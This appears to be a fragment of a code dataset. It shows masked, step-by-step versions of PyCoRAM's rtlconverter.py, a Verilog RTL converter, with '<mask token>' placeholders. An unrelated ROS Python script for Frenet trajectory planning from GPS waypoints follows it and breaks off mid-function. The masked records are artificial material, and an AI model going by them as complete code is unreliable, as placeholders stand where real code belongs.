OptionParser\n INFO = 'PyCoRAM RTL Converter'\n VERSION = utils.version.VERSION\n USAGE = 'Usage: python rtlconverter.py -t TOPMODULE file ...'\n\n def showVersion():\n print(INFO)\n print(VERSION)\n print(USAGE)\n sys.exit()\n optparser = OptionParser()\n optparser.add_option('-v', '--version', action='store_true', dest=\n 'showversion', default=False, help='Show the version')\n optparser.add_option('-t', '--top', dest='topmodule', default=\n 'userlogic', help='Top module, Default=userlogic')\n optparser.add_option('-o', '--output', dest='outputfile', default=\n 'out.v', help='Output file name, Default=out.v')\n optparser.add_option('-I', '--include', dest='include', action='append',\n default=[], help='Include path')\n optparser.add_option('-D', dest='define', action='append', default=[],\n help='Macro Definition')\n optparser.add_option('--singleclock', action='store_true', dest=\n 'single_clock', default=False, help='Use single clock mode')\n options, args = optparser.parse_args()\n filelist = args\n if options.showversion:\n showVersion()\n for f in filelist:\n if not os.path.exists(f):\n raise IOError('file not found: ' + f)\n if len(filelist) == 0:\n showVersion()\n converter = RtlConverter(filelist, options.topmodule, include=options.\n include, define=options.define, single_clock=options.single_clock)\n ast = converter.generate()\n converter.dumpCoramObject()\n asttocode = ASTCodeGenerator()\n code = asttocode.visit(ast)\n f = open(options.outputfile, 'w')\n f.write(code)\n f.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n<mask token>\nif sys.version_info[0] >= 3:\n from rtlconverter.convertvisitor import InstanceConvertVisitor\n from rtlconverter.convertvisitor import InstanceReplaceVisitor\nelse:\n from convertvisitor import InstanceConvertVisitor\n from convertvisitor import InstanceReplaceVisitor\n<mask token>\n\n\nclass RtlConverter(object):\n\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n\n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print('----------------------------------------')\n print('CoRAM Objects in User-defined RTL')\n for mode, coram_items in coram_object.items():\n print(' CoRAM %s' % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(\n coram_items, key=lambda x: x[1]):\n print(' %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)' %\n (mode, idx, '' if subid is None else ''.join(('[', str(\n subid), ']')), threadname, str(addrwidth), str(datawidth)))\n\n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n code_parser = VerilogCodeParser(self.filelist, preprocess_include=\n self.include, preprocess_define=preprocess_define)\n ast = code_parser.parse()\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable,\n self.topmodule)\n instanceconvert_visitor.start_visit()\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems()\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,\n replaced_instports, replaced_items, new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i):\n continue\n top_ioports.append(i)\n top_scope = ScopeChain([ScopeLabel(self.topmodule, 'module')])\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n for sk, sv in top_sigs.items():\n if len(sk) > 2:\n continue\n signame = sk[1].scopename\n for svv in sv:\n if signame in top_ioports and not (signaltype.isClock(\n signame) or signaltype.isReset(signame)) and isinstance(svv\n , vast.Input) or isinstance(svv, vast.Output\n ) or isinstance(svv, vast.Inout):\n port = svv\n msb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.msb,\n top_scope))\n lsb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.lsb,\n top_scope))\n width = int(msb_val.value) - 
int(lsb_val.value) + 1\n self.top_ioports[signame] = port, width\n break\n for ck, cv in top_params.items():\n if len(ck) > 2:\n continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar):\n continue\n self.top_parameters[signame] = param\n self.coram_object = instanceconvert_visitor.getCoramObject()\n return ret\n\n\ndef main():\n from optparse import OptionParser\n INFO = 'PyCoRAM RTL Converter'\n VERSION = utils.version.VERSION\n USAGE = 'Usage: python rtlconverter.py -t TOPMODULE file ...'\n\n def showVersion():\n print(INFO)\n print(VERSION)\n print(USAGE)\n sys.exit()\n optparser = OptionParser()\n optparser.add_option('-v', '--version', action='store_true', dest=\n 'showversion', default=False, help='Show the version')\n optparser.add_option('-t', '--top', dest='topmodule', default=\n 'userlogic', help='Top module, Default=userlogic')\n optparser.add_option('-o', '--output', dest='outputfile', default=\n 'out.v', help='Output file name, Default=out.v')\n optparser.add_option('-I', '--include', dest='include', action='append',\n default=[], help='Include path')\n optparser.add_option('-D', dest='define', action='append', default=[],\n help='Macro Definition')\n optparser.add_option('--singleclock', action='store_true', dest=\n 'single_clock', default=False, help='Use single clock mode')\n options, args = optparser.parse_args()\n filelist = args\n if options.showversion:\n showVersion()\n for f in filelist:\n if not os.path.exists(f):\n raise IOError('file not found: ' + f)\n if len(filelist) == 0:\n showVersion()\n converter = RtlConverter(filelist, options.topmodule, include=options.\n include, define=options.define, single_clock=options.single_clock)\n ast = converter.generate()\n converter.dumpCoramObject()\n asttocode = ASTCodeGenerator()\n code = asttocode.visit(ast)\n f = open(options.outputfile, 'w')\n f.write(code)\n f.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\nimport os\nimport subprocess\nimport copy\nimport collections\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport utils.version\nif sys.version_info[0] >= 3:\n from rtlconverter.convertvisitor import InstanceConvertVisitor\n from rtlconverter.convertvisitor import InstanceReplaceVisitor\nelse:\n from convertvisitor import InstanceConvertVisitor\n from convertvisitor import InstanceReplaceVisitor\nimport pyverilog.utils.signaltype as signaltype\nfrom pyverilog.utils.scope import ScopeLabel, ScopeChain\nimport pyverilog.vparser.ast as vast\nfrom pyverilog.vparser.parser import VerilogCodeParser\nfrom pyverilog.dataflow.modulevisitor import ModuleVisitor\nfrom pyverilog.ast_code_generator.codegen import ASTCodeGenerator\n\n\nclass RtlConverter(object):\n\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n\n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print('----------------------------------------')\n print('CoRAM Objects in User-defined RTL')\n for mode, coram_items in coram_object.items():\n print(' CoRAM %s' % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(\n coram_items, key=lambda x: x[1]):\n print(' %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)' %\n (mode, idx, '' if subid is None else ''.join(('[', str(\n subid), ']')), threadname, str(addrwidth), str(datawidth)))\n\n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n code_parser = VerilogCodeParser(self.filelist, preprocess_include=\n self.include, preprocess_define=preprocess_define)\n ast = code_parser.parse()\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable,\n self.topmodule)\n instanceconvert_visitor.start_visit()\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems()\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance,\n replaced_instports, replaced_items, new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i):\n continue\n top_ioports.append(i)\n top_scope = ScopeChain([ScopeLabel(self.topmodule, 'module')])\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n for sk, sv in top_sigs.items():\n if len(sk) > 2:\n continue\n signame = sk[1].scopename\n for svv in sv:\n if signame in top_ioports and not (signaltype.isClock(\n signame) or 
signaltype.isReset(signame)) and isinstance(svv\n , vast.Input) or isinstance(svv, vast.Output\n ) or isinstance(svv, vast.Inout):\n port = svv\n msb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.msb,\n top_scope))\n lsb_val = instanceconvert_visitor.optimize(\n instanceconvert_visitor.getTree(port.width.lsb,\n top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = port, width\n break\n for ck, cv in top_params.items():\n if len(ck) > 2:\n continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar):\n continue\n self.top_parameters[signame] = param\n self.coram_object = instanceconvert_visitor.getCoramObject()\n return ret\n\n\ndef main():\n from optparse import OptionParser\n INFO = 'PyCoRAM RTL Converter'\n VERSION = utils.version.VERSION\n USAGE = 'Usage: python rtlconverter.py -t TOPMODULE file ...'\n\n def showVersion():\n print(INFO)\n print(VERSION)\n print(USAGE)\n sys.exit()\n optparser = OptionParser()\n optparser.add_option('-v', '--version', action='store_true', dest=\n 'showversion', default=False, help='Show the version')\n optparser.add_option('-t', '--top', dest='topmodule', default=\n 'userlogic', help='Top module, Default=userlogic')\n optparser.add_option('-o', '--output', dest='outputfile', default=\n 'out.v', help='Output file name, Default=out.v')\n optparser.add_option('-I', '--include', dest='include', action='append',\n default=[], help='Include path')\n optparser.add_option('-D', dest='define', action='append', default=[],\n help='Macro Definition')\n optparser.add_option('--singleclock', action='store_true', dest=\n 'single_clock', default=False, help='Use single clock mode')\n options, args = optparser.parse_args()\n filelist = args\n if options.showversion:\n showVersion()\n for f in filelist:\n if not os.path.exists(f):\n raise IOError('file not found: ' + f)\n if len(filelist) == 0:\n showVersion()\n converter = RtlConverter(filelist, options.topmodule, include=options.\n include, define=options.define, single_clock=options.single_clock)\n ast = converter.generate()\n converter.dumpCoramObject()\n asttocode = ASTCodeGenerator()\n code = asttocode.visit(ast)\n f = open(options.outputfile, 'w')\n f.write(code)\n f.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#-------------------------------------------------------------------------------\n# rtlconverter.py\n# \n# PyCoRAM RTL Converter\n#\n# Copyright (C) 2013, Shinya Takamaeda-Yamazaki\n# License: Apache 2.0\n#-------------------------------------------------------------------------------\nimport sys\nimport os\nimport subprocess\nimport copy\nimport collections\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))) )\n\nimport utils.version\n\nif sys.version_info[0] >= 3:\n from rtlconverter.convertvisitor import InstanceConvertVisitor\n from rtlconverter.convertvisitor import InstanceReplaceVisitor\nelse:\n from convertvisitor import InstanceConvertVisitor\n from convertvisitor import InstanceReplaceVisitor\n\nimport pyverilog.utils.signaltype as signaltype\nfrom pyverilog.utils.scope import ScopeLabel, ScopeChain\nimport pyverilog.vparser.ast as vast\nfrom pyverilog.vparser.parser import VerilogCodeParser\nfrom pyverilog.dataflow.modulevisitor import ModuleVisitor\nfrom pyverilog.ast_code_generator.codegen import ASTCodeGenerator\n\nclass RtlConverter(object):\n def __init__(self, filelist, topmodule='userlogic', include=None,\n define=None, single_clock=False):\n self.filelist = filelist\n self.topmodule = topmodule\n self.include = include\n self.define = define\n self.single_clock = single_clock\n\n self.top_parameters = collections.OrderedDict()\n self.top_ioports = collections.OrderedDict()\n self.coram_object = collections.OrderedDict()\n\n def getTopParameters(self):\n return self.top_parameters\n \n def getTopIOPorts(self):\n return self.top_ioports\n\n def getCoramObject(self):\n return self.coram_object\n\n def dumpCoramObject(self):\n coram_object = self.getCoramObject()\n print(\"----------------------------------------\")\n print(\"CoRAM Objects in User-defined RTL\")\n for mode, coram_items in coram_object.items():\n print(\" CoRAM %s\" % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(coram_items, key=lambda x:x[1]):\n print(\" %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)\" %\n (mode, idx, ( '' if subid is None else ''.join( ('[', str(subid), ']') ) ),\n threadname, str(addrwidth), str(datawidth)))\n \n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n\n code_parser = VerilogCodeParser(self.filelist,\n preprocess_include=self.include,\n preprocess_define=preprocess_define)\n ast = code_parser.parse()\n\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable, self.topmodule)\n instanceconvert_visitor.start_visit()\n\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems() \n\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance, \n replaced_instports,\n replaced_items,\n new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n\n # gather user-defined io-ports on top-module and parameters to connect external\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or 
signaltype.isReset(i): continue\n top_ioports.append(i)\n\n top_scope = ScopeChain( [ScopeLabel(self.topmodule, 'module')] )\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n\n for sk, sv in top_sigs.items():\n if len(sk) > 2: continue\n signame = sk[1].scopename\n for svv in sv:\n if (signame in top_ioports and \n not (signaltype.isClock(signame) or signaltype.isReset(signame)) and\n isinstance(svv, vast.Input) or isinstance(svv, vast.Output) or isinstance(svv, vast.Inout)):\n port = svv\n msb_val = instanceconvert_visitor.optimize(instanceconvert_visitor.getTree(port.width.msb, top_scope))\n lsb_val = instanceconvert_visitor.optimize(instanceconvert_visitor.getTree(port.width.lsb, top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = (port, width)\n break\n\n for ck, cv in top_params.items():\n if len(ck) > 2: continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar): continue\n self.top_parameters[signame] = param\n\n self.coram_object = instanceconvert_visitor.getCoramObject()\n\n return ret\n\ndef main():\n from optparse import OptionParser\n INFO = \"PyCoRAM RTL Converter\"\n VERSION = utils.version.VERSION\n USAGE = \"Usage: python rtlconverter.py -t TOPMODULE file ...\"\n\n def showVersion():\n print(INFO)\n print(VERSION)\n print(USAGE)\n sys.exit()\n \n optparser = OptionParser()\n optparser.add_option(\"-v\",\"--version\",action=\"store_true\",dest=\"showversion\",\n default=False,help=\"Show the version\")\n optparser.add_option(\"-t\",\"--top\",dest=\"topmodule\",\n default=\"userlogic\",help=\"Top module, Default=userlogic\")\n optparser.add_option(\"-o\",\"--output\",dest=\"outputfile\",\n default=\"out.v\",help=\"Output file name, Default=out.v\")\n optparser.add_option(\"-I\",\"--include\",dest=\"include\",action=\"append\",\n default=[],help=\"Include path\")\n optparser.add_option(\"-D\",dest=\"define\",action=\"append\",\n default=[],help=\"Macro Definition\")\n optparser.add_option(\"--singleclock\",action=\"store_true\",dest=\"single_clock\",\n default=False,help=\"Use single clock mode\")\n (options, args) = optparser.parse_args()\n\n filelist = args\n if options.showversion:\n showVersion()\n\n for f in filelist:\n if not os.path.exists(f): raise IOError(\"file not found: \" + f)\n\n if len(filelist) == 0:\n showVersion()\n\n converter = RtlConverter(filelist, options.topmodule,\n include=options.include, \n define=options.define,\n single_clock=options.single_clock)\n ast = converter.generate()\n converter.dumpCoramObject()\n \n asttocode = ASTCodeGenerator()\n code = asttocode.visit(ast)\n\n f = open(options.outputfile, 'w')\n f.write(code)\n f.close()\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
7,
8,
9,
10,
11
]
}
|
[
7,
8,
9,
10,
11
] |
#!/usr/bin/python2
# -*- coding: UTF-8 -*-
'''
Publish the planned trajectory:
path.x; path.y; c_speed;
'''
import numpy as np
import matplotlib.pyplot as plt
import copy
import math
from cubic_spline import Spline2D
from polynomials import QuarticPolynomial, QuinticPolynomial
import time
import rospy
from std_msgs.msg import String
from std_msgs.msg import Float32
from std_msgs.msg import Int32
from geometry_msgs.msg import Point
from nav_msgs.msg import Path
from local_planner.msg import localPath
from geometry_msgs.msg import PoseStamped, Quaternion
import tf
from CAN_driver.msg import Motor_Feedback
from GNSS_driver.msg import GNSS_CAN
import sys
# Parameters
MAX_SPEED = 30.0  # maximum speed [m/s]
MAX_ACCEL = 50.0  # maximum acceleration [m/ss]
MAX_CURVATURE = 30.0  # maximum curvature [1/m]
MAX_ROAD_WIDTH = 10.0  # maximum road width [m]
D_ROAD_W = 2.0  # road width sampling interval [m]
DT = 0.3  # Delta T [s]
MAXT = 6.0  # maximum prediction horizon [s]
MINT = 4.0  # minimum prediction horizon [s]
TARGET_SPEED = 15.0/3.6  # target speed [m/s], i.e. the longitudinal speed to keep
D_T_S = 10.0/3.6  # target speed sampling interval [m/s]
N_S_SAMPLE = 0.1  # number of target speed samples
ROBOT_RADIUS = 2.3  # vehicle radius [m]
THRESH_DIST = 0.01
# cost function weights
KJ = 0.8
KT = 0.1
KD = 20.0
KLAT = 0.8
KLON = 0.2
show_animation = True
Gob_x = []
Gob_y = []
# planning-failure flag (1 = planning failed), consumed by the decision layer
PathFail_flag = 0
class FrenetPath:
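    # A candidate trajectory: lateral d(t) and longitudinal s(t) profiles in the Frenet frame,
    # their costs (cd, cv, cf) and the converted global-frame x, y, yaw, ds and curvature.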
def __init__(self):
self.t = []
self.d = []
self.d_d = []
self.d_dd = []
self.d_ddd = []
self.s = []
self.s_d = []
self.s_dd = []
self.s_ddd = []
self.cd = 0.0
self.cv = 0.0
self.cf = 0.0
self.x = []
self.y = []
self.yaw = []
self.ds = []
self.c = []
def calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):
frenet_paths = []
# generate path to each offset goal
for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):
        # sample lateral offsets and generate a trajectory for each target configuration
# Lateral motion planning
for Ti in np.arange(MINT, MAXT, DT):
fp = FrenetPath()
            # lateral quintic polynomial for the target configuration (di, Ti)
lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)
fp.t = [t for t in np.arange(0.0, Ti, DT)]
fp.d = [lat_qp.calc_point(t) for t in fp.t]
fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]
fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]
fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]
            # Longitudinal motion planning (velocity keeping)
for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):
tfp = copy.deepcopy(fp)
lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)
tfp.s = [lon_qp.calc_point(t) for t in fp.t]
tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]
tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]
tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]
                ###########################################################
                # cost function for high-speed driving
                ###########################################################
                Jp = sum(np.power(tfp.d_ddd, 2))  # square of jerk
                Js = sum(np.power(tfp.s_ddd, 2))  # square of jerk
                # square of diff from target speed
                ds = (TARGET_SPEED - tfp.s_d[-1])**2
                # lateral cost
                tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1]**2
                # longitudinal cost
                tfp.cv = KJ * Js + KT * Ti + KD * ds
                # total cost: weighted sum of the lateral (d) and longitudinal (s) costs
                #########################################################
                # cost function for low-speed driving (kept for reference, disabled)
                #########################################################
                # ltfp = copy.deepcopy(tfp)
                # ltfp.d_sss = [lat_qp.calc_third_derivative(s) for s in tfp.s]
                # Jp_s = sum(np.power(ltfp.d_sss, 2))  # square of jerk
                # Js = sum(np.power(tfp.s_ddd, 2))  # square of jerk
                # # S = s1 - s0
                # dS = tfp.s[-1] - s0
                # # lateral cost
                # tfp.cd = KJ * Jp_s + KT * dS + KD * tfp.d[-1] ** 2
                # # longitudinal cost
                # tfp.cv = KJ * Js + KT * Ti + KD * ds
tfp.cf = KLAT * tfp.cd + KLON * tfp.cv
frenet_paths.append(tfp)
return frenet_paths
def calc_global_paths(fplist, csp):
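    # Convert each Frenet path (s, d) back to global coordinates using the reference
    # spline, then derive yaw, segment length ds and curvature along the path.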
for fp in fplist:
# calc global positions
for i in range(len(fp.s)):
ix, iy = csp.calc_position(fp.s[i])
if ix is None:
break
iyaw = csp.calc_yaw(fp.s[i])
di = fp.d[i]
fx = ix + di * math.cos(iyaw + math.pi / 2.0)
fy = iy + di * math.sin(iyaw + math.pi / 2.0)
fp.x.append(fx)
fp.y.append(fy)
# calc yaw and ds
for i in range(len(fp.x) - 1):
dx = fp.x[i + 1] - fp.x[i]
dy = fp.y[i + 1] - fp.y[i]
fp.yaw.append(math.atan2(dy, dx))
fp.ds.append(math.sqrt(dx**2 + dy**2))
fp.yaw.append(fp.yaw[-1])
fp.ds.append(fp.ds[-1])
# calc curvature
for i in range(len(fp.yaw) - 1):
fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])
return fplist
def check_collision(fp, ob):
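    # A path collides if any of its points lies within ROBOT_RADIUS of an obstacle.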
for i in range(len(ob[:, 0])):
d = [((ix - ob[i, 0])**2 + (iy - ob[i, 1])**2)
for (ix, iy) in zip(fp.x, fp.y)]
collision = any([di <= ROBOT_RADIUS**2 for di in d])
if collision:
return False
return True
def check_paths(fplist, ob):
"""
    filter out paths that exceed the max speed, max acceleration or max curvature, or that collide with an obstacle
"""
okind = []
for i in range(len(fplist)):
if any([v > MAX_SPEED for v in fplist[i].s_d]): # Max speed check
continue
elif any([abs(a) > MAX_ACCEL for a in fplist[i].s_dd]): # Max accel check
continue
elif any([abs(c) > MAX_CURVATURE for c in fplist[i].c]): # Max curvature check
continue
elif not check_collision(fplist[i], ob):
continue
okind.append(i)
return [fplist[i] for i in okind]
def frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):
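    # Generate candidate paths in the Frenet frame, convert them to global coordinates,
    # discard those violating the speed/acceleration/curvature/collision limits,
    # and return the remaining path with the lowest cost.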
ob = np.array(ob)
fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)
fplist = calc_global_paths(fplist, csp)
fplist = check_paths(fplist, ob)
# find minimum cost path
mincost = float("inf")
bestpath = None
for fp in fplist:
if mincost >= fp.cf:
mincost = fp.cf
bestpath = fp
return bestpath
def generate_road_widle(x,y):
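    # Offset the reference spline by +/- MAX_ROAD_WIDTH/2 along its normal to obtain
    # the left and right road boundaries (used only for plotting).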
csp = Spline2D(x, y)
s = np.arange(0, csp.s[-1], 0.1)
road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []
for i_s in s:
ix, iy = csp.calc_position(i_s)
road_left_ix = ix + MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)
road_left_iy = iy + MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)
road_right_ix = ix - MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)
road_right_iy = iy - MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)
road_left_x.append(road_left_ix)
road_left_y.append(road_left_iy)
road_right_x.append(road_right_ix)
road_right_y.append(road_right_iy)
return road_left_x, road_left_y, road_right_x, road_right_y
def generate_target_course(x, y):
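    # Fit a 2-D cubic spline through the waypoints and sample it every 0.1 m to get
    # the reference x, y, yaw and curvature.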
csp = Spline2D(x, y)
s = np.arange(0, csp.s[-1], 0.1) #0.1
rx, ry, ryaw, rk = [], [], [], []
for i_s in s:
ix, iy = csp.calc_position(i_s)
rx.append(ix)
ry.append(iy)
ryaw.append(csp.calc_yaw(i_s))
rk.append(csp.calc_curvature(i_s))
return rx, ry, ryaw, rk, csp
#######################################################################################
def load_global_path():
global zero_cord_x,zero_cord_y
bet = 0.1
    blank = []  # buffer
    white = []  # buffer
    yellow = []  # buffer
    GPS_x = []  # x of the recorded waypoints
    GPS_y = []  # y of the recorded waypoints
    # read the recorded waypoints
nums, ber = np.loadtxt("/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt", dtype=str, delimiter=',', unpack=True)
for i in range(len(nums)):
        if not nums[i] in blank:  # drop duplicate points
#blank.append(nums[i])
yellow.append(float(nums[i]))
white.append(float(ber[i]))
    bx = yellow[0]  # coordinates of the starting point
by = white[0]
for i in range(len(yellow)):
dx = yellow[i] - bx
dy = white[i] - by
dis = math.sqrt(dx ** 2 + dy ** 2)
        if dis > bet:  # keep only points farther apart than the set spacing
            GPS_x.append(yellow[i])  # so every kept point satisfies the spacing requirement
GPS_y.append(white[i])
bx = yellow[i]
by = white[i]
    GPS_x = np.array(GPS_x)  # convert the list to an array
GPS_y = np.array(GPS_y)
#print("cx:",cx)
#print("cy:",cy)
zero_cord_x = GPS_x[0]
zero_cord_y = GPS_y[0]
GPS_x = GPS_x - zero_cord_x
GPS_y = GPS_y - zero_cord_y
plt.plot(GPS_x,GPS_y, "-r", label="GPS point ")
plt.plot()
plt.show()
return GPS_x, GPS_y
class Info(object):
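    # ROS node wrapper: subscribes to the GNSS, obstacle and motor-feedback topics and
    # publishes the planned velocity and local path.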
def __init__(self):
self.CurrGPS_lat = float(-1)
self.CurrGPS_lon = float(-1)
self.CurrentVelocity = float(-1)
self.Target_Velocity = float(-1)
self.ImuYaw = float(-1)
self.Target_Theta = float(-1)
#self.CommandMessage = Car_Input()
self.gob = np.array([])
self.ob = np.array([])
self.gobx = np.array([])
self.goby = np.array([])
# Subscribers
rospy.Subscriber("coordinate", Point, self.FeedbackCallbackObs)
        sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.FeedbackCallbackGPSIMU,queue_size = 10)  # subscribe to GNSS (GPS/IMU) data
rospy.Subscriber("Motor_Feedback_mssage", Motor_Feedback,self.RVcallback,queue_size = 10)
def FeedbackCallbackGPSIMU(self, msg):
self.CurrGPS_lat = msg.latitude
self.CurrGPS_lon = msg.longitude
self.ImuYaw = (90-msg.course_angle)*np.pi/180
#print(self.CurrGPS_lat,self.CurrGPS_lon,self.ImuYaw)
def FeedbackCallbackObs(self, msg):
global Gob_x
global Gob_y
self.gobx = msg.x
self.goby = msg.y
#print("msg.x","msg.y", msg.x, msg.y)
Gob_x.append(self.gobx)
Gob_y.append(self.goby)
#print("Gob_x","Gob_y", Gob_x, Gob_y)
#np.append(self.gobx,5)
#np.append(self.goby,5)
self.gob = np.column_stack((Gob_x, Gob_y))
#print(self.gobx,self.goby)
#print(self.gob)
def RVcallback(self,msg):
self.CurrentVelocity = msg.Base_Vehspd
#print("*"*50)
#print("rv:",rv)
#rospy.loginfo('I heard: %s', data.data)
def init(self):
return self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx, self.goby, self.gob, self.CurrentVelocity
def talker(self,Target_Velocity, path_record):
self.rate = rospy.Rate(100) # 10hz
        self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10)  # velocity publisher
        # publisher path_pub publishes the trajectory
        self.path_pub = rospy.Publisher('trajectory', localPath, queue_size = 50)  # path publisher
        self.pub_Velocity.publish(Target_Velocity)
        # publish the path
self.path_pub.publish(path_record)
#self.rate.sleep()
# def talker(self,Target_Velocity,Target_Theta):
    # self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10)  # velocity publisher
# self.pub_Steering = rospy.Publisher('Car_Steering', Float32, queue_size = 10)
# self.rate = rospy.Rate(100) # 10hz
# self.pub_Velocity.publish(Target_Velocity)
# self.pub_Steering.publish(Target_Theta)
# self.rate.sleep()
#######################################################################################
def get_transalation(curr_gps_lat,curr_gps_lon):
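    # Convert absolute GPS coordinates into the local frame anchored at the first waypoint.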
curr_posy=(float(curr_gps_lon)-zero_cord_y)
curr_posx=(float(curr_gps_lat)-zero_cord_x)
#print("curr_posy,curr_posx=",curr_posy,curr_posx)
return curr_posx, curr_posy
def get_transformation(pt,curr_yaw,T):
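    # Apply a 2-D rotation by curr_yaw followed by a translation T; used to map obstacle points into the global frame.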
